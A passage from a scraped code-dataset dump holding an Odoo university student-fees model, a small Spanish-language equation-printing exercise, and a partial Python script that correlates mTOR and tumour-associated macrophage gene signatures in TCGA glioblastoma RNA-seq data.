UDP protocol/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":14611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"648650254","text":"from odoo import api, fields, models\n\n\nclass Student(models.Model):\n _inherit = 'uni.student'\n\n\n def calc_total_residaul(self):\n return sum (line.sub_total - line.paid_amount for line in self.fees_ids if line.paid_amount != 0)\n \n\n year_id = fields.Many2one(\n string=\"Academic Year\",\n comodel_name=\"uni.year\",\n readonly=True,\n )\n\n certificate_type_id = fields.Many2one(\n comodel_name='uni.certificate.type',\n string='Certificate Type',\n )\n\n currency_id = fields.Many2one('res.currency' , string=\"Currency\")\n\n admission_date = fields.Date(string='Admission date')\n\n admission_rec = fields.Many2one('uni.admission', string=\"Admission Record\")\n\n category_id = fields.Many2many(\n string=\"Discount Type\",\n comodel_name=\"uni.student_category\",\n readonly=True,\n )\n\n fees_ids = fields.One2many(\n string=\"Student Fees\",\n comodel_name=\"student.fees\",\n inverse_name=\"student_id\",\n readonly=False\n )\n\n fees_payment_ids = fields.One2many(\n string=\"Fees Payments\",\n comodel_name=\"fees.payment.line\",\n inverse_name=\"student_id\",\n readonly=False\n )\n\n amount_sub_total = fields.Float(\n string='Sub Total', store=True, readonly=True, compute='_compute_amount')\n amount_total = fields.Float(\n string='Total', store=True, readonly=True, compute='_compute_amount')\n discount = fields.Float(\n string='Discount', store=True, readonly=True, compute='_compute_amount')\n # TODO: get default recivable account\n '''account_id = fields.Many2one('account.account',\n\t\t\t\t\t\t\t\t domain=lambda self: [('user_type_id.id', '=', self.env.ref(\n\t\t\t\t\t\t\t\t\t 'account.data_account_type_receivable').id)],\n\t\t\t\t\t\t\t\t help=\"Student recivable 
account\")\n\t'''\n guardian_national_id_img = fields.Binary(string=\"National ID Image\", )\n student_national_id_img = fields.Binary(string=\"National ID Image\", )\n\n # foot_ball = fields.Boolean(string=\"Foot Ball\", )\n # volley_ball = fields.Boolean(string=\"Volley Ball\", )\n # basket_ball = fields.Boolean(string=\"Basket Ball\", )\n # swimming = fields.Boolean(string=\"Swimming\", )\n # table_tennis = fields.Boolean(string=\"table tennis\", )\n # other_sport = fields.Char(string=\"Other\", )\n\n # memorizing_holly_quran = fields.Boolean(\n # string=\"memorizing the holly Quran\", )\n # poetry = fields.Boolean(string=\"Poetry\", )\n # stage = fields.Boolean(string=\"Stage\", )\n # singing = fields.Boolean(string=\"singing\", )\n # other_cultural = fields.Char(string=\"Other\", )\n\n \n kin_emergency = fields.Char()\n kin_ph_emergency = fields.Integer()\n\n # blood_group = fields.Selection(\n # string='Blood group',\n # selection=[\n # ('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), \n # ('O+', 'O+'), ('O-', 'O-'), ('AB+', 'AB+'), ('AB-', 'AB-')\n # ],default='B+'\n # )\n allergies_disea = fields.Char()\n chronic_dsease = fields.Char()\n other_dsease = fields.Char()\n\n type_admission = fields.Selection(\n selection=[\n ('new_admission', 'New Admission'),\n ('transfer' , 'Transer from another University'),\n ('upgrading' , 'Upgrading'),\n ('degree_holder' , 'Degree holder')\n ],default='new_admission'\n )\n\n is_previouse_admitt = fields.Selection(\n selection=[\n ('yes', 'Yes'),\n ('no', 'No'),\n ],default='no'\n )\n\n reasons = fields.Selection(\n selection=[\n ('resignation', 'Resignation'),\n ('acadimic_dismissal', 'Acadimic Dismissal'),\n ],default =''\n )\n\n other = fields.Char()\n\n sibling_in_nile = fields.Integer( )\n\n\n\n\n\n @api.one\n @api.depends('fees_ids.sub_total', 'fees_ids.discount')\n def _compute_amount(self):\n self.amount_sub_total = sum(\n line.sub_total for line in self.fees_ids)\n self.discount = sum(\n line.discount for line in self.fees_ids)\n self.amount_total = self.amount_sub_total # - self.discount\n\n\n def create_move(self):\n return {\n 'name': _('Fees Payment'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'post.customer.check.action',\n 'type': 'ir.actions.act_window',\n 'target':'new',\n 'context':{\n 'default_name':self.check_number,\n 'default_partner_id':self.line_id.partner_id.id,\n 'default_amount': self.amount - self.paid_amount,\n 'default_line_id':self.id,\n 'default_description':self.description,\n 'default_currency_id':self.currency_id.id,\n }\n\n }\n","sub_path":"uni_admission/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185607331","text":"#funciones\r\n\r\n#crear_dep: recibe la cantidad de variables dependientes e inserta cada una en una lista\r\ndef crear_dep(lst):\r\n\tn = int(input(\"\\nVariables Dependientes\\n\\t-Cantidad de variables dependientes: \"))\r\n\tfor i in range(0 , n):\r\n\t\tvariable = str(input(\"\\t\\t-Variable {}: \".format(i+1)))\r\n\t\tlst.insert(i, variable)\r\n\r\n#crear_indep:\r\ndef crear_indep(lst):\r\n\tn = int(input(\"\\nVariables Independientes\\n\\t-Cantidad de variables independientes: \"))\r\n\tfor i in range(0 , n):\r\n\t\tvariable = str(input(\"\\t\\t-Variable {}: \".format(i+1)))\r\n\t\tlst.insert(i, variable)\r\n#imprimir_lst: imprime una lista\r\ndef imprimir_ecuacion(lst):\r\n\tecuacion = \"\"\r\n\tfor it in 
lst:\r\n\t\tecuacion+=it\r\n\tprint(ecuacion)\r\n\r\n\r\ndef encontrar_soluciones(solucion, ecuacion, independientes, dependientes):\r\n\ti = 0\r\n\twhile i < len(dependientes):\r\n\t\tposicion = 0\r\n\t\tj = 0\r\n\t\twhile j < len(independientes):\r\n\t\t\tfor termino in ecuacion:\r\n\t\t\t\tif termino == 'x' or termino == 'y':\r\n\t\t\t\t\tsolucion.insert(posicion, dependientes[i])\r\n\t\t\t\telif termino == 'a' or termino == 'b':\r\n\t\t\t\t\tsolucion.insert(posicion, independientes[j])\r\n\t\t\t\telse:\r\n\t\t\t\t\tsolucion.insert(posicion, termino)\r\n\t\t\t\tposicion+=1\t\r\n\t\t\timprimir_ecuacion(solucion)\r\n\t\t\tsolucion.clear()\t\r\n\t\t\tj+=1\r\n\t\ti+=1\r\n\treturn True\r\n\r\n\"\"\"............................................................\"\"\"\r\n\r\n#programa principal\r\nlst_solucion = []\r\nlst_dependientes = []\r\nlst_independientes = []\r\nlst_ecuaciones = [[\"(\", \"x\", \"-\", \"y\", \")\", \"*\", \"(\", \"a\", \"-\", \"b\", \")\"], [\"x\", \"+\", \"*\", \"a\", \"-\", \"y\"],[\"x\", \"*\", \"*\", \"2\", \"+\", \"2\", \"*\", \"*\", \"a\", \"-\", \"y\", \"*\", \"*\", \"2\"]]\r\n\r\nprint(\"\\t\\tPrograma Ecuaciones\\n\")\r\n\r\ncrear_dep(lst_dependientes)\r\ncrear_indep(lst_independientes)\r\n\r\n#imprimir_lst(lst_dependientes)\r\n#imprimir_lst(lst_independientes)\r\n\r\nfor i in range(0, 3):\r\n\tencontrar_soluciones(lst_solucion, lst_ecuaciones[i], lst_independientes, lst_dependientes)\r\n\r\n","sub_path":"curso 1/ejercicio1/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"180834035","text":"import collections\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport statsmodels.api as sm\nfrom matplotlib import pyplot as plt, colors\nfrom scipy import stats\nfrom statsmodels.sandbox.regression.predstd import wls_prediction_std\n\nfrom plotting import venn, common\nfrom rnaseq import gsva\nfrom settings import HGIC_LOCAL_DIR, GIT_LFS_DATA_DIR, DATA_DIR\nfrom utils import setops, output, log, reference_genomes\n\nlogger = log.get_console_logger()\n\ndef line_plot_pvalues_slope(\n pvals,\n slopes,\n cmap=plt.get_cmap('Reds'),\n alpha=None,\n log_scale=True,\n vmin=None,\n vmax=None,\n):\n \"\"\"\n Plot summarising pvalue and correlation slope simultaneously using position (slope) and colour (pval).\n Hard coded into vertical orientation (TODO: make this a parameter??)\n :param pvals: DataFrame. Index and columns will be used for ticklabels. Suggest using -log10\n :param slopes: DataFrame, must match pvals\n :param pct_to_size_func:\n :param cmap: cmap used to represent\n :param alpha: If supplied, highlight all results with p < alpha.\n :param log_scale: If True (default), convert p values to -log10 scale.\n :param vmin: For pvalue shading. If not supplied, min of data will be used\n :param vmax: For pvalue shading. 
If not supplied, max of data will be used\n :return:\n \"\"\"\n if sorted(pvals.index) != sorted(slopes.index):\n raise AttributeError(\"Index of pvals and concords must match\")\n if sorted(pvals.columns) != sorted(slopes.columns):\n raise AttributeError(\"Columns of pvals and concords must match\")\n\n if alpha is None:\n alpha = -1.\n\n signif = pvals < alpha\n\n if log_scale:\n pvals = -np.log10(pvals.astype(float))\n\n slopes = slopes.loc[pvals.index, pvals.columns]\n\n if vmin is None:\n vmin = pvals.values.min()\n if vmax is None:\n vmax = pvals.values.max()\n\n ny, nx = pvals.shape\n markers = common.get_best_marker_map(nx)\n\n gs = plt.GridSpec(nrows=2, ncols=1, height_ratios=[1, 19])\n fig = plt.figure(figsize=(1.5 * nx, .5 * ny))\n ax = fig.add_subplot(gs[1])\n ax.invert_yaxis()\n\n cax = fig.add_subplot(gs[0])\n\n plogp_norm = colors.Normalize(vmin=vmin, vmax=vmax)\n plogp_sm = plt.cm.ScalarMappable(cmap=cmap, norm=plogp_norm)\n\n for i, col in enumerate(slopes.columns):\n ew = [1.5 if t else 0.7 for t in signif[col].values]\n ax.scatter(\n slopes[col],\n range(ny),\n c=[plogp_sm.to_rgba(t) for t in pvals[col].values],\n s=60,\n edgecolor='k',\n linewidths=ew,\n marker=markers[i]\n )\n\n ax.set_xlabel('Slope', fontsize=12)\n ax.set_yticks(range(ny))\n ax.set_yticklabels(pvals.index, fontsize=12)\n # ax.set_xlim([50, 100])\n plogp_sm.set_array(pvals)\n fig.colorbar(plogp_sm, cax=cax, orientation='horizontal')\n cax.xaxis.set_label_position('top')\n cax.set_xlabel(r'$-\\log_{10}(p)$')\n\n type_attrs = {\n 'class': 'line',\n 'linestyle': 'none',\n 'markeredgecolor': 'k',\n 'markeredgewidth': 1.,\n 'markerfacecolor': 'none',\n 'markersize': 8\n }\n\n leg_dict = {}\n for i, col in enumerate(pvals.columns):\n leg_dict[col] = dict(type_attrs)\n leg_dict[col].update({'marker': markers[i]})\n\n common.add_custom_legend(ax, leg_dict, loc_outside=True, loc_outside_horiz='right')\n gs.update(left=0.2, bottom=0.1, right=0.72, top=0.95, hspace=0.12)\n\n return {\n 'fig': fig,\n 'ax': ax,\n 'gs': gs,\n 'cax': cax\n }\n\n\nkegg_mtor_from_msigdb = [\n \"AKT3\", \"EIF4B\", \"EIF4E\", \"EIF4EBP1\", \"AKT1\", \"AKT2\", \"FIGF\", \"PIK3R5\", \"MTOR\", \"RICTOR\", \"EIF4E1B\", \"ULK3\",\n \"RPS6KA6\", \"HIF1A\", \"IGF1\", \"INS\", \"PDPK1\", \"CAB39\", \"PGF\", \"PIK3CA\", \"PIK3CB\", \"PIK3CD\", \"PIK3CG\", \"PIK3R1\",\n \"PIK3R2\", \"DDIT4\", \"PRKAA1\", \"PRKAA2\", \"MAPK1\", \"MAPK3\", \"RPTOR\", \"RHEB\", \"RPS6\", \"RPS6KA1\", \"RPS6KA2\",\n \"RPS6KA3\", \"RPS6KB1\", \"RPS6KB2\", \"MLST8\", \"BRAF\", \"STK11\", \"TSC1\", \"TSC2\", \"VEGFA\", \"VEGFB\", \"VEGFC\", \"CAB39L\",\n \"ULK1\", \"PIK3R3\", \"STRADA\", \"EIF4E2\", \"ULK2\"\n]\n\n# downloaded directly from KEGG website (hsa04150)\nkegg_mtor_from_kegg = [\n \"SLC7A5\", \"SLC3A2\", \"SLC38A9\", \"ATP6V1A\", \"ATP6V1B1\", \"ATP6V1B2\", \"ATP6V1C2\", \"ATP6V1C1\", \"ATP6V1D\", \"ATP6V1E2\",\n \"ATP6V1E1\", \"ATP6V1F\", \"ATP6V1G1\", \"ATP6V1G3\", \"ATP6V1G2\", \"ATP6V1H\", \"LAMTOR1\", \"LAMTOR2\", \"LAMTOR3\",\n \"LAMTOR4\", \"LAMTOR5\", \"FLCN\", \"FNIP1\", \"FNIP2\", \"RRAGA\", \"RRAGB\", \"RRAGC\", \"RRAGD\", \"SESN2\", \"CASTOR1\",\n \"CASTOR2\", \"MIOS\", \"SEH1L\", \"WDR24\", \"WDR59\", \"SEC13\", \"DEPDC5\", \"NPRL2\", \"NPRL3\", \"SKP2\", \"RNF152\", \"RPTOR\",\n \"AKT1S1\", \"MTOR\", \"DEPTOR\", \"MLST8\", \"TELO2\", \"TTI1\", \"CLIP1\", \"GRB10\", \"ULK1\", \"ULK2\", \"EIF4EBP1\", \"EIF4E\",\n \"EIF4E2\", \"EIF4E1B\", \"RPS6KB1\", \"RPS6KB2\", \"EIF4B\", \"RPS6\", \"STRADA\", \"STRADB\", \"STK11\", \"CAB39\", \"CAB39L\",\n 
\"PRKAA1\", \"PRKAA2\", \"TSC1\", \"TSC2\", \"TBC1D7\", \"TBC1D7\", \"RHEB\", \"DDIT4\", \"WNT1\", \"WNT2\", \"WNT2B\", \"WNT3\",\n \"WNT3A\", \"WNT4\", \"WNT5A\", \"WNT5B\", \"WNT6\", \"WNT7A\", \"WNT7B\", \"WNT8A\", \"WNT8B\", \"WNT9A\", \"WNT9B\", \"WNT10B\",\n \"WNT10A\", \"WNT11\", \"WNT16\", \"FZD1\", \"FZD7\", \"FZD2\", \"FZD3\", \"FZD4\", \"FZD5\", \"FZD8\", \"FZD6\", \"FZD10\", \"FZD9\",\n \"LRP5\", \"LRP6\", \"DVL3\", \"DVL2\", \"DVL1\", \"GSK3B\", \"TNF\", \"TNFRSF1A\", \"IKBKB\", \"INS\", \"IGF1\", \"INSR\", \"IGF1R\",\n \"GRB2\", \"SOS1\", \"SOS2\", \"HRAS\", \"KRAS\", \"NRAS\", \"BRAF\", \"RAF1\", \"MAP2K1\", \"MAP2K2\", \"MAPK1\", \"MAPK3\", \"RPS6KA3\",\n \"RPS6KA1\", \"RPS6KA2\", \"RPS6KA6\", \"IRS1\", \"PIK3R1\", \"PIK3R2\", \"PIK3R3\", \"PIK3CA\", \"PIK3CD\", \"PIK3CB\", \"PTEN\",\n \"PDPK1\", \"AKT1\", \"AKT2\", \"AKT3\", \"CHUK\", \"MAPKAP1\", \"RICTOR\", \"PRR5\", \"RHOA\", \"PRKCA\", \"PRKCB\", \"PRKCG\", \"SGK1\",\n \"LPIN1\"\n]\n\npid_mtor = [\n \"SSPO\", \"SGK1\", \"EEF2K\", \"IKBKB\", \"PLD2\", \"PDPK1\", \"ATG13\", \"ULK1\", \"NRAS\", \"HRAS\", \"KRAS\", \"RAF1\", \"EIF4E\",\n \"EEF2\", \"BRAF\", \"PRKCA\", \"RPS6KB1\", \"EIF4B\", \"CCNE1\", \"CDK2\", \"YY1\", \"YWHAQ\", \"MAPK3\", \"MAPK1\", \"PML\", \"CLIP1\",\n \"AKT1\", \"YWHAB\", \"SFN\", \"IRS1\", \"MAP2K2\", \"SREBF1\", \"MTOR\", \"PXN\", \"TSC2\", \"EIF4A1\", \"RHOA\", \"YWHAG\", \"YWHAE\",\n \"RAC1\", \"YWHAZ\", \"PRR5\", \"CYCS\", \"MAP2K1\", \"YWHAH\", \"BNIP3\", \"PLD1\", \"EIF4EBP1\", \"RHEB\", \"RPS6KA1\", \"PDCD4\",\n \"RRAGB\", \"RICTOR\", \"RRAGA\", \"ULK2\", \"RPTOR\", \"DEPTOR\", \"RB1CC1\", \"TSC1\", \"AKT1S1\", \"MAPKAP1\", \"MLST8\",\n \"POLDIP3\", \"RRAGC\", \"RRAGD\", \"DDIT4\", \"RRN3\", \"PPARGC1A\", \"FBXW11\"\n]\n\nbiocarta_mtor = [\n \"EIF4A1\", \"EIF4A2\", \"EIF4B\", \"EIF4E\", \"EIF4EBP1\", \"EIF4G1\", \"EIF4G2\", \"AKT1\", \"FKBP1A\", \"MTOR\", \"PDK2\", \"PDPK1\",\n \"PIK3CA\", \"PIK3R1\", \"PPP2CA\", \"PTEN\", \"RPS6\", \"RPS6KB1\", \"TSC1\", \"TSC2\", \"MKNK1\", \"EIF3A\", \"EIF4G3\"\n]\n\nmanual_gene_name_correction = {\n 'ATG13': 'KIAA0652',\n 'CASTOR1': 'GATSL3',\n 'CASTOR2': 'GATSL2', # might also be GATSL1?\n 'DEPTOR': 'DEPDC6',\n 'LAMTOR1': 'C11orf59',\n 'LAMTOR2': 'ROBLD3',\n 'LAMTOR3': 'MAPKSP1',\n 'LAMTOR4': 'C7orf59',\n 'LAMTOR5': 'HBXIP',\n 'TTI1': 'KIAA0406',\n 'VEGFD': 'FIGF',\n 'HLA-DMB': 'HLA.DMB',\n 'HLA-DQA1': 'HLA.DQA1',\n 'HLA-DRB5': 'HLA.DRB5'\n}\n\n\ndef z_transform(df, axis=None):\n if axis is None:\n return (df - df.values.flatten().mean()) / df.values.flatten().std()\n elif axis == 0:\n i = 0\n j = 1\n elif axis == 1:\n i = 1\n j = 0\n else:\n raise NotImplementedError(\"axis argument must be None, 0 or 1.\")\n return df.subtract(df.mean(axis=i), axis=j).divide(df.std(axis=i), axis=j)\n\n\ndef ols_plot(y, x, add_intercept=True, alpha=0.05, xlim=None, ax=None):\n \"\"\"\n Generate a scatter plot with OLS prediction plus confidence intervals\n :param y:\n :param x:\n :param add_intercept:\n :param alpha:\n :param ax:\n :return:\n \"\"\"\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n try:\n x = x.astype(float)\n except Exception:\n pass\n\n if add_intercept:\n X = sm.add_constant(x)\n else:\n X = x\n\n model = sm.OLS(y, X)\n res = model.fit()\n\n # plot data\n ax.scatter(x, y, marker='o')\n if xlim is None:\n xlim = np.array(ax.get_xlim())\n\n xx = np.linspace(xlim[0], xlim[1], 100)\n\n # compute prediction and confidence intervals\n if add_intercept:\n b0, b1 = res.params\n sdev, lower, upper = wls_prediction_std(res, 
sm.add_constant(xx), alpha=alpha)\n # b0_min, b0_max = res.conf_int(alpha=alpha)[0]\n # b1_min, b1_max = res.conf_int(alpha=alpha)[1]\n\n else:\n b1 = res.params[0]\n b0 = 0.\n sdev, lower, upper = wls_prediction_std(res, xx, alpha=alpha)\n # b0 = b0_min = b0_max = 0.\n # b1_min, b1_max = res.conf_int(alpha=alpha)[0]\n\n ax.plot(xx, b0 + b1 * xx, 'k-', lw=1.5)\n ax.fill_between(xx, lower, upper, edgecolor='b', facecolor='b', alpha=0.4)\n\n # lower = b0_min + b1_min * xlim\n # upper = b0_max + b1_max * xlim\n # ax.fill_between(xlim, lower, upper, edgecolor='b', facecolor='b', alpha=0.4)\n\n ax.set_xlim(xlim)\n return res, ax\n\n\ndef scatter_plot_with_linregress(x, y, group_list=None, groups=None):\n nrow = 2\n reduce_before_return = False\n if groups is None:\n # no subgroups: just run with 'all'\n nrow = 1\n ncol = 1\n group_list = ['foo']\n groups = pd.Series('foo', index=x.index)\n reduce_before_return = True\n else:\n if group_list is None:\n group_list = groups.unique()\n # add 'all' to the group list\n group_list = list(group_list) + [None]\n ncol = int(np.ceil(len(group_list) * 0.5))\n res = pd.DataFrame(index=group_list, columns=['slope', 'intercept', 'rvalue', 'pvalue', 'stderr'])\n sm_res = {}\n\n fig, axs = plt.subplots(nrow, ncol, sharex=True, sharey=True)\n if reduce_before_return:\n axs = np.array([axs])\n\n axs_seen = set(axs.flat)\n\n for i, sg in enumerate(group_list):\n if sg is None:\n sg_idx = pd.Series(True, index=groups.index)\n ttl = 'All'\n else:\n sg_idx = (groups == sg)\n ttl = sg\n this_x = x.loc[sg_idx].values.astype(float)\n this_y = y.loc[sg_idx].values.astype(float)\n lr = stats.linregress(this_x, this_y)\n res.loc[sg] = lr\n\n ax = axs.flat[i]\n axs_seen.remove(ax)\n\n sm_res[ttl], _ = ols_plot(\n this_y,\n this_x,\n xlim=[-3.5, 3.5],\n ax=ax\n )\n\n rsq = lr.rvalue ** 2\n sl = lr.slope\n pval = lr.pvalue\n\n if np.abs(sl - sm_res[ttl].params[-1]) > 1e-3:\n logger.warn(\"Subgroup %s. stats.linregress slope doesn't agree with statsmodels OLS.\", sg)\n\n if pval < 0.05:\n lbl = \"$R^2 = %.2f$\\n$\\mathrm{slope}=%.2f$\\n$p=\\mathbf{%.3e}$\" % (rsq, sl, pval)\n else:\n lbl = \"$R^2 = %.2f$\\n$\\mathrm{slope}=%.2f$\\n$p=%.3e$\" % (rsq, sl, pval)\n ax.text(\n 1.,\n 0.,\n lbl,\n bbox={'facecolor': 'w', 'alpha': 0.3},\n verticalalignment='bottom',\n horizontalalignment='right',\n transform=ax.transAxes\n )\n ax.set_ylim([-4, 4])\n ax.set_xlabel(x.name)\n ax.set_ylabel(y.name)\n if not reduce_before_return:\n ax.set_title(ttl)\n\n if reduce_before_return:\n res = res.loc['foo']\n\n for ax in axs_seen:\n ax.set_visible(False)\n\n return {\n 'fig': fig,\n 'axs': axs,\n 'linregress': res,\n 'statsmodels': sm_res\n }\n\n\ndef get_slope_and_pval(plot_dict, col_order=None):\n \"\"\"\n Extract the slope and pvalue of the linear regression results\n :param col_order: if supplied, this gives the order of the index in the returned DataFrames.\n :param plot_dict: Dictionary of input data.\n Keys will be used in the results. 
Values are the dict output from scatter_plot_with_linregress\n :return: Two pd.DataFrame objects: s, p\n \"\"\"\n if col_order is None:\n col_order = plot_dict.values()[0]['statsmodels'].keys()\n s = pd.DataFrame(index=plot_dict.keys(), columns=col_order)\n p = s.copy()\n\n for k, v in plot_dict.items():\n s.loc[k] = [v['statsmodels'][t].params[-1] for t in col_order]\n p.loc[k] = [v['statsmodels'][t].f_pvalue for t in col_order]\n\n return s, p\n\n\ndef plot_signature_vs_gene(dat, es, the_gene, geneset_name, ax=None):\n the_expr = dat.loc[the_gene]\n # Z transform the signature scores for this gene set\n the_signature = es.loc[geneset_name]\n the_signature = (the_signature - the_signature.mean()) / the_signature.std()\n # ensure the ordering is the same\n the_signature = the_signature.loc[the_expr.index]\n lr = stats.linregress(the_signature.astype(float), np.log2(the_expr + 1))\n x_lr = np.array([the_signature.min(), the_signature.max()])\n y_lr = lr.intercept + lr.slope * x_lr\n\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n else:\n fig = None\n\n ax.scatter(the_signature, np.log2(the_expr + 1))\n ax.plot(x_lr, y_lr, 'k--')\n ax.set_xlabel('Normalised ssGSEA score')\n ax.set_ylabel('log2(%s)' % the_gene)\n if fig is not None:\n fig.tight_layout()\n return ax\n\n\ndef mtor_signature_dict():\n # kegg mtor from msigdb (hsa04150)\n for arr in [kegg_mtor_from_msigdb, kegg_mtor_from_kegg, pid_mtor, biocarta_mtor]:\n for i, t in enumerate(arr):\n if t in manual_gene_name_correction:\n arr[i] = manual_gene_name_correction[t]\n\n return {\n 'kegg_msigdb': kegg_mtor_from_msigdb,\n 'kegg': kegg_mtor_from_kegg,\n 'biocarta': biocarta_mtor,\n 'pid': pid_mtor\n }\n\n\ndef tam_signature_dict():\n # Human-specific by Muller et al.\n muller_tam_signature_fn = os.path.join(GIT_LFS_DATA_DIR, 'muller_2017_tam', '13059_2017_1362_MOESM5_ESM.xlsx')\n muller_tam_signatures = pd.read_excel(muller_tam_signature_fn, header=0, index_col=None)\n muller_tam_signatures = {\n 'MG': muller_tam_signatures['MG_Markers'].dropna().values,\n 'BMDM': muller_tam_signatures['Mac_Markers'].dropna().values,\n }\n\n # Mouse version (needs translating) by Bowman et al.\n bowman_tam_signature_fn = os.path.join(DATA_DIR, 'rnaseq', 'GSE86573', 'table_S2.csv')\n bowman_tam_signatures = pd.read_csv(bowman_tam_signature_fn, header=0, index_col=None)\n\n # generate series of orthologs of the relevant gene signatures\n orth = reference_genomes.homologs_table(reference_genomes.mouse_tid, reference_genomes.human_tid)\n orth = orth.set_index('gene_symbol_10090').squeeze()\n\n bowman_tam_signatures = {\n 'MG': orth.reindex(bowman_tam_signatures['MG'].dropna().values).dropna().values,\n 'BMDM': orth.reindex(bowman_tam_signatures['BMDM'].dropna().values).dropna().values,\n }\n\n return {\n 'bowman': bowman_tam_signatures,\n 'muller': muller_tam_signatures,\n }\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Use the TCGA cohort to validate a link between the mTOR pathway and the proportion of microglial and macrophage\n immune infiltrate in the bulk samples.\n \n mTOR is assessed using a known set of genes.\n \n Tumour-associated bone marrow-derived macrophages (TAM-BMDM) and microglia (TAM-MG) are distinguished using a \n human signature from Muller et al. (Genome Biol 2017) or a converted mouse signature from Bowman et al. 
(???).\n \"\"\"\n rnaseq_type = 'gliovis'\n remove_idh1 = True\n tam_signature_source = 'bowman'\n # tam_signature_source = 'muller'\n mtor_source = 'kegg_msigdb' # ('kegg', 'pid', 'biocarta')\n # class_method = 'wang'\n class_method = 'verhaak'\n # toggle allowing more than one class to be used\n allow_multiple_classes = False\n\n # load mTOR signatures\n mtor_gs_dict = mtor_signature_dict()\n\n # load MG/BMDM signatures\n tam_gs_dict = tam_signature_dict()\n\n mtor_geneset = mtor_gs_dict[mtor_source]\n tam_genesets = tam_gs_dict[tam_signature_source]\n\n genesets = dict(tam_genesets)\n genesets['mTOR'] = mtor_geneset\n\n outdir = output.unique_output_dir()\n\n # export all signatures to a file\n from utils import dictionary\n\n all_gs_dict = dictionary.nested_dict_to_flat(tam_gs_dict)\n all_gs_dict[('mTOR',)] = mtor_geneset\n\n for_export = pd.DataFrame(index=range(max((len(t) for t in all_gs_dict.values()))), columns=[])\n for k, v in all_gs_dict.items():\n the_key = '_'.join(k)\n for_export.loc[range(len(v)), the_key] = sorted(v)\n for_export.fillna('', inplace=True)\n for_export = for_export.sort_index(axis=1)\n for_export.to_excel(os.path.join(outdir, \"gene_sets.xlsx\"), index=False)\n\n # Venn diagram showing various mTOR signature options and overlap between them\n fig, ax = plt.subplots()\n venn.venn_diagram(*mtor_gs_dict.values(), set_labels=mtor_gs_dict.keys(), ax=ax)\n fig.tight_layout()\n ax.set_facecolor('w')\n fig.savefig(os.path.join(outdir, \"venn_mtor_genesets.png\"), dpi=200)\n\n basedir = os.path.join(\n HGIC_LOCAL_DIR,\n 'current/input_data/tcga'\n )\n\n brennan_s7_fn = os.path.join(basedir, \"brennan_s7.csv\")\n brennan_s7 = pd.read_csv(brennan_s7_fn, header=0, index_col=0)\n\n if rnaseq_type == 'counts':\n rnaseq_dat_fn = os.path.join(basedir, 'rnaseq.xlsx')\n rnaseq_meta_fn = os.path.join(basedir, 'rnaseq.meta.xlsx')\n sheet_name = 'htseq'\n wang_fn = os.path.join(basedir, 'wang_classification', 'tcga_counts_wang_classification.csv')\n elif rnaseq_type == 'fpkm':\n rnaseq_dat_fn = os.path.join(basedir, 'rnaseq.xlsx')\n rnaseq_meta_fn = os.path.join(basedir, 'rnaseq.meta.xlsx')\n sheet_name = 'fpkm'\n wang_fn = os.path.join(basedir, 'wang_classification', 'tcga_fpkm_wang_classification.csv')\n elif rnaseq_type == 'gliovis':\n rnaseq_dat_fn = os.path.join(basedir, 'gliovis', 'gliovis_tcga_gbm_rnaseq.xlsx')\n wang_fn = os.path.join(basedir, 'gliovis', 'wang_classification', 'tcga_gliovis_wang_classification.csv')\n sheet_name = 0\n else:\n raise NotImplementedError(\"Unrecognised rnaseq data type\")\n\n\n rnaseq_dat_raw = pd.read_excel(rnaseq_dat_fn, header=0, index_col=0, sheet_name=sheet_name)\n wang_classes = pd.read_csv(wang_fn, header=0, index_col=0)\n\n if rnaseq_type == 'gliovis':\n rnaseq_meta_fn = os.path.join(basedir, 'gliovis', 'GlioVis_TCGA_GBMLGG.meta.xlsx')\n rnaseq_meta = pd.read_excel(rnaseq_meta_fn, header=0, index_col=0)\n # filter only GBM\n rnaseq_meta = rnaseq_meta.loc[rnaseq_meta.Histology == 'GBM']\n rnaseq_dat_raw = rnaseq_dat_raw.loc[:, rnaseq_meta.index]\n\n rnaseq_meta.rename(\n columns={'IDH.status': 'idh1_status', 'Subtype.original': 'expression_subclass'},\n inplace=True\n )\n\n else:\n # simplify sample naming\n new_cols = rnaseq_dat_raw.columns.str.replace(r'(?PTCGA-[0-9]{2}-[0-9]{4})-.*', r'\\g')\n\n # rnaseq_meta = rnaseq_meta.loc[~new_cols.duplicated()]\n rnaseq_dat_raw = rnaseq_dat_raw.loc[:, ~new_cols.duplicated()]\n # rnaseq_meta.index = new_cols[~new_cols.duplicated()]\n rnaseq_dat_raw.columns = new_cols[~new_cols.duplicated()]\n 
rnaseq_meta = brennan_s7.reindex(rnaseq_dat_raw.columns)\n\n\n if remove_idh1:\n # filter IDH1 mutants\n idh1_wt = (~rnaseq_meta.idh1_status.isnull()) & (rnaseq_meta.idh1_status == 'WT')\n\n rnaseq_meta = rnaseq_meta.loc[idh1_wt]\n rnaseq_dat = rnaseq_dat_raw.loc[:, rnaseq_meta.index]\n else:\n rnaseq_dat = rnaseq_dat_raw.loc[:, rnaseq_dat_raw.columns.str.contains('TCGA')]\n\n if rnaseq_type != 'gliovis':\n # add gene symbols for gene signature scoring?\n gs = reference_genomes.ensembl_to_gene_symbol(rnaseq_dat.index).dropna()\n rnaseq_dat = rnaseq_dat.loc[gs.index]\n rnaseq_dat.index = gs.values\n\n if rnaseq_type == 'counts':\n # convert to CPM\n rnaseq_dat = rnaseq_dat.divide(rnaseq_dat.sum(axis=0), axis=1) * 1e6\n\n rnaseq_meta.insert(0, 'wang_classification_simplicity', wang_classes.loc[rnaseq_meta.index, 'Simplicity score'])\n rnaseq_meta.insert(0, 'wang_classification_num_matches', wang_classes.loc[rnaseq_meta.index, 'Number of matches'])\n rnaseq_meta.insert(0, 'wang_classification', wang_classes.loc[rnaseq_meta.index, 'Wang subclass'])\n\n # check that 